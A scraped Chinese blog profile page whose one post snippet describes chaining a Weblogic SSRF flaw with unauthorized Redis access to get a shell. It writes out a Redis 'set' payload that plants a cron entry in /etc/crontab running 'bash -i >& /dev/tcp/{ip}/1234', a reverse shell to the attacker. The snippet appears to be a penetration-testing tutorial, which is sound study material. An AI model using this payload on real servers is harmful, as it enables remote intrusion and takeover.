- 博客(2)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 利用Weblogic中间件存在的SSRF漏洞结合redis未授权访问漏洞GetShell
在Search Public Registries,选择Public Registry中的 IBM,同时勾选Search by business name,开启bp进行抓包,点击search。set 1 "\n\n\n\n * * * * * root bash -i >& /dev/tcp/{本地物理机ip}/1234 0>&1\n\n\n\n"给redis服务器发送三条命令,将其写入redis的容器里里面的/etc/crontab,从而将shell反弹到本地物理机ip的1234端口。
2022-10-11 08:51:23
887
1
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人